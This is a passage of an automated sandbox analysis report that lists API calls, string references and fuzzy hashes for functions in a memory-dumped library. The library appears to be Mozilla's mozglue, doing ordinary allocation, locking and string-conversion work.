                                                • Part of subcall function 6C4FFA80: AcquireSRWLockExclusive.KERNEL32(6C54F448), ref: 6C4FFA99
                                              • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C50653F
                                              • free.MOZGLUE(?), ref: 6C50655A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                              • String ID:
                                              • API String ID: 3596744550-0
                                              • Opcode ID: 3abb74ece652e525bfa6520d2f9ccab1e5bc10bd98670366e5874f70427cec9d
                                              • Instruction ID: 109b5389f882f7eef4783fa1562fe54fac3836cd3a36b9304127a913990ae4af
                                              • Opcode Fuzzy Hash: 3abb74ece652e525bfa6520d2f9ccab1e5bc10bd98670366e5874f70427cec9d
                                              • Instruction Fuzzy Hash: 1F3170B5A043159FD700DF14D884A9BB7E4BF89318F41442EEC5A87741EB30E919CB92
                                              APIs
                                              • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C51D019,?,?,?,?,?,00000000,?,6C50DA31,00100000,?), ref: 6C4FFFD3
                                              • memcpy.VCRUNTIME140(00000000,?,?,?,6C51D019,?,?,?,?,?,00000000,?,6C50DA31,00100000,?,?), ref: 6C4FFFF5
                                              • free.MOZGLUE(?,?,?,?,?,6C51D019,?,?,?,?,?,00000000,?,6C50DA31,00100000,?), ref: 6C50001B
                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C51D019,?,?,?,?,?,00000000,?,6C50DA31,00100000,?,?), ref: 6C50002A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                              • String ID:
                                              • API String ID: 826125452-0
                                              • Opcode ID: 07aec78b26390d0d279a669131073c807e7bb3143324d0eaf8593ab3ff4c12e5
                                              • Instruction ID: 47785c0e9aeccf01870fdfc1a2ba2004fddaa49322895fe03bdc68d9b6e8eaa4
                                              • Opcode Fuzzy Hash: 07aec78b26390d0d279a669131073c807e7bb3143324d0eaf8593ab3ff4c12e5
                                              • Instruction Fuzzy Hash: 9121C4B2B002155BE718DE789C94CAEB7BAEBC53247250739E425D7780EB70AD0286E1
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4DB4F5
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4DB502
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4DB542
                                              • free.MOZGLUE(?), ref: 6C4DB578
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                              • String ID:
                                              • API String ID: 2047719359-0
                                              • Opcode ID: af1a39cd67dbbbcfb48a501abfd4d2e7b7d4e8bfecb2b9eb795b75cca44d3da3
                                              • Instruction ID: 9f9094a3248f0f54d6be1f72475775104e8a377b979f8f0842623a66e5b92d6e
                                              • Opcode Fuzzy Hash: af1a39cd67dbbbcfb48a501abfd4d2e7b7d4e8bfecb2b9eb795b75cca44d3da3
                                              • Instruction Fuzzy Hash: B011FD30A14B00C7D712EF29C820F65B3B0FF9A32DF12970AE84952B01EBB1B1C18784
                                              APIs
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C4CF20E,?), ref: 6C503DF5
                                              • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C4CF20E,00000000,?), ref: 6C503DFC
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C503E06
                                              • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C503E0E
                                                • Part of subcall function 6C4FCC00: GetCurrentProcess.KERNEL32(?,?,6C4C31A7), ref: 6C4FCC0D
                                                • Part of subcall function 6C4FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C4C31A7), ref: 6C4FCC16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                              • String ID:
                                              • API String ID: 2787204188-0
                                              • Opcode ID: 93d96188cb0879917b13220fae5cf29015067455d95154fd395781127416f67b
                                              • Instruction ID: 37eb7485e6ac891208785f721669061ba8e4a44aeaee71a551a324c3c8b5e58d
                                              • Opcode Fuzzy Hash: 93d96188cb0879917b13220fae5cf29015067455d95154fd395781127416f67b
                                              • Instruction Fuzzy Hash: F0F0FE716402187BD700AB54DC41DAB376DEB86728F054024FD0C57741E735BD1986FA
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51205B
                                              • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C51201B,?,?,?,?,?,?,?,6C511F8F,?,?), ref: 6C512064
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51208E
                                              • free.MOZGLUE(?,?,?,00000000,?,6C51201B,?,?,?,?,?,?,?,6C511F8F,?,?), ref: 6C5120A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                              • String ID:
                                              • API String ID: 2047719359-0
                                              • Opcode ID: 36c62e1bea583b48036a1eca898a838957da8bcb664b8d0e23915f8dbdbb3377
                                              • Instruction ID: d4264b6477fbc0cebd37ac8bcc406425a5fea63df1c5f37a721c4eb7fc26f24e
                                              • Opcode Fuzzy Hash: 36c62e1bea583b48036a1eca898a838957da8bcb664b8d0e23915f8dbdbb3377
                                              • Instruction Fuzzy Hash: AAF0B471104A009FD711EF16DC8CB5BB7F8EFCA328F11012AE50687B10D772A805CB9A
                                              APIs
                                              • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C5185D3
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C518725
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                              • String ID: map/set<T> too long
                                              • API String ID: 3720097785-1285458680
                                              • Opcode ID: 2df272f97ae33c307863f4fe99924b3821e11a9d28409ed3aa5abfe4e7d4cc4e
                                              • Instruction ID: 4c2d299b963d7b5f84a663a10069d5460242487db81bd004fc599ca32fedf675
                                              • Opcode Fuzzy Hash: 2df272f97ae33c307863f4fe99924b3821e11a9d28409ed3aa5abfe4e7d4cc4e
                                              • Instruction Fuzzy Hash: E2515674608651CFE711CF18C888A55BBF1BF59318F1AC28AD8595BB52C335EC45CF92
                                              APIs
                                              • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C4CBDEB
                                              • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C4CBE8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                              • String ID: 0
                                              • API String ID: 2811501404-4108050209
                                              • Opcode ID: ad0cead38aa7a7bc7e611be040063042e8f4cda82fa2ea64c83a584380a72f7a
                                              • Instruction ID: dfe06d7ae12bb9dfd7e1db285e5868ce24987ffc2ad203f10b44012f4a01c0f1
                                              • Opcode Fuzzy Hash: ad0cead38aa7a7bc7e611be040063042e8f4cda82fa2ea64c83a584380a72f7a
                                              • Instruction Fuzzy Hash: B2419D75A09745CFC701CF38C481E9BBBE4AF8A348F008A1DF995A7621E731D9498B83
                                              APIs
                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C503D19
                                              • mozalloc_abort.MOZGLUE(?), ref: 6C503D6C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: _errnomozalloc_abort
                                              • String ID: d
                                              • API String ID: 3471241338-2564639436
                                              • Opcode ID: 73ee0d07f70638099f96f174f58a9da06d7a41554b9f6ee0489a85e6a6b56295
                                              • Instruction ID: 5b9671961bc2b50f572538c3b403e044d15986983c0835a7b9eebcbe25524466
                                              • Opcode Fuzzy Hash: 73ee0d07f70638099f96f174f58a9da06d7a41554b9f6ee0489a85e6a6b56295
                                              • Instruction Fuzzy Hash: 3C11C136F04688DBDB01DF69CC148EEB775EF96358B458229EC49DB602FB70A984C394
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4D44B2,6C54E21C,6C54F7F8), ref: 6C4D473E
                                              • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C4D474A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetNtLoaderAPI
                                              • API String ID: 1646373207-1628273567
                                              • Opcode ID: de3970cc0e98d6bff10340f6e50dda1f8a82097ed3f5c59fdd0d1f3c9f0f0cfd
                                              • Instruction ID: 7b8579c753b05aacfdfcc1464f2e23e755359c4e5bd94d3ad725c303c54b132b
                                              • Opcode Fuzzy Hash: de3970cc0e98d6bff10340f6e50dda1f8a82097ed3f5c59fdd0d1f3c9f0f0cfd
                                              • Instruction Fuzzy Hash: BF0180757002148FDF00BFA98C54E1A7BF9EB8B355B46806AE905CB710DB74E8018F95
                                              APIs
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C526E22
                                              • __Init_thread_footer.LIBCMT ref: 6C526E3F
                                              Strings
                                              • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C526E1D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Init_thread_footergetenv
                                              • String ID: MOZ_DISABLE_WALKTHESTACK
                                              • API String ID: 1472356752-1153589363
                                              • Opcode ID: dba1773854e990e24c17a9036a101a703a123dcfb90c01508c238fb016f3c34f
                                              • Instruction ID: 8147bad65be2cef00c8da8765998150a339bba6080e430d99d02531f8f7ca8a5
                                              • Opcode Fuzzy Hash: dba1773854e990e24c17a9036a101a703a123dcfb90c01508c238fb016f3c34f
                                              • Instruction Fuzzy Hash: C1F05235204380CBEB00EBACCC50E9377B2A75331CF058269C81586BE1DB24B517CAAB
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 6C4D9EEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: Infinity$NaN
                                              • API String ID: 1385522511-4285296124
                                              • Opcode ID: f875c5092566edc8c060bf0eef2f3c2f5fec63ff75bc566df89d03c34db06185
                                              • Instruction ID: 0d95eb479d5c8db6aa5b260346bba7739ef6a47e4bf194be4b1d4a64862c4595
                                              • Opcode Fuzzy Hash: f875c5092566edc8c060bf0eef2f3c2f5fec63ff75bc566df89d03c34db06185
                                              • Instruction Fuzzy Hash: 90F0A971600242CADB00EF5CEE65F8237B1A75330EF228B58C6040AB80E7366546CA9A
                                              APIs
                                              • moz_xmalloc.MOZGLUE(0KPl,?,6C504B30,80000000,?,6C504AB7,?,6C4C43CF,?,6C4C42D2), ref: 6C4D6C42
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • moz_xmalloc.MOZGLUE(0KPl,?,6C504B30,80000000,?,6C504AB7,?,6C4C43CF,?,6C4C42D2), ref: 6C4D6C58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: moz_xmalloc$malloc
                                              • String ID: 0KPl
                                              • API String ID: 1967447596-1394554299
                                              • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                              • Instruction ID: 34b13b93b5c7c03e500dfaed42df3243fc4eefee21abc4bd2eed9b0142890d64
                                              • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                              • Instruction Fuzzy Hash: 21E086F1A105054A9B08F9B8BC29EAA72C88B14AE97054E79EC22C6BDCFA54F5548191
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F860), ref: 6C4D385C
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F860,?), ref: 6C4D3871
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireRelease
                                              • String ID: ,Tl
                                              • API String ID: 17069307-2037166668
                                              • Opcode ID: b36df50a097211c839f3af55cc2bb368b8ed1e1c9d8135d9cd2839d021f880e1
                                              • Instruction ID: fabab8278a1dd99cfe72767fa88a8197a55bc9599954d68c0ff1b6f1e4ffe921
                                              • Opcode Fuzzy Hash: b36df50a097211c839f3af55cc2bb368b8ed1e1c9d8135d9cd2839d021f880e1
                                              • Instruction Fuzzy Hash: 72E04F31A05A1897C711FFAA9C15E8ABBF8EE47799306C649F40A1BE00C771A58186D9
                                              APIs
                                              • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C4DBEE3
                                              • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C4DBEF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$CallsDisableLoadThread
                                              • String ID: cryptbase.dll
                                              • API String ID: 4137859361-1262567842
                                              • Opcode ID: 8c87b9ac2d42243438bfa4e3fd7367df7946c37c991425707feee161f3249137
                                              • Instruction ID: 901a9bf93ef6eb85c888acb1e187638fcceac0ec22753032aa906d410b7c240a
                                              • Opcode Fuzzy Hash: 8c87b9ac2d42243438bfa4e3fd7367df7946c37c991425707feee161f3249137
                                              • Instruction Fuzzy Hash: 9CD0A9322C4608EACA04FAA08C0AF2A3BB8A70232AF11C020F30584951C7B0A421CB88
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C51B2C9,?,?,?,6C51B127,?,?,?,?,?,?,?,?,?,6C51AE52), ref: 6C51B628
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C5190FF
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C519108
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C51B2C9,?,?,?,6C51B127,?,?,?,?,?,?,?,?,?,6C51AE52), ref: 6C51B67D
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C51B2C9,?,?,?,6C51B127,?,?,?,?,?,?,?,?,?,6C51AE52), ref: 6C51B708
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C51B127,?,?,?,?,?,?,?,?), ref: 6C51B74D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: freemalloc
                                              • String ID:
                                              • API String ID: 3061335427-0
                                              • Opcode ID: 2bead075a174c54992a8031aebe956e3c81a782cfa8e0f613de3a372c9763e98
                                              • Instruction ID: e82fc6c46b2bcf5890479fd506f5bbe0140d773902756c1341fd8fc62b1718f8
                                              • Opcode Fuzzy Hash: 2bead075a174c54992a8031aebe956e3c81a782cfa8e0f613de3a372c9763e98
                                              • Instruction Fuzzy Hash: 5E51CEB1A092168FEB14EF18CD8866EB7B5FF85305F55852DC85AABB10D731A804CBA1
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C50FF2A), ref: 6C51DFFD
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C5190FF
                                                • Part of subcall function 6C5190E0: free.MOZGLUE(?,00000000,?,?,6C51DEDB), ref: 6C519108
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C50FF2A), ref: 6C51E04A
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C50FF2A), ref: 6C51E0C0
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C50FF2A), ref: 6C51E0FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: freemalloc
                                              • String ID:
                                              • API String ID: 3061335427-0
                                              • Opcode ID: a19bd95a727d5c581ea638117a6dc5d94c7a9511f968ff0770f67cc0bb899b5a
                                              • Instruction ID: b98515a9b457aa9fc6886b599250d2bcfebd752d33cb76f3de6464f9c5af9182
                                              • Opcode Fuzzy Hash: a19bd95a727d5c581ea638117a6dc5d94c7a9511f968ff0770f67cc0bb899b5a
                                              • Instruction Fuzzy Hash: C341C0B56082068FFB14CF68CC8836A73B2BB85308F154939D516DBF40E7B2E904CB92
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C516EAB
                                              • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C516EFA
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C516F1E
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C516F5C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: malloc$freememcpy
                                              • String ID:
                                              • API String ID: 4259248891-0
                                              • Opcode ID: ca982af932998b85d195ca160ff531ebe00b98538b441d4f5a3f79adc31bd397
                                              • Instruction ID: 7780d0c2c91c8281078a935d3ca8997423f169aa63d375a55fa71691eb663986
                                              • Opcode Fuzzy Hash: ca982af932998b85d195ca160ff531ebe00b98538b441d4f5a3f79adc31bd397
                                              • Instruction Fuzzy Hash: 8B31E571A1460A8FEB04CF2CCD846AE73E9EBC4304F508639D41AC7A55EF31E659CB91
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C4D0A4D), ref: 6C52B5EA
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C4D0A4D), ref: 6C52B623
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C4D0A4D), ref: 6C52B66C
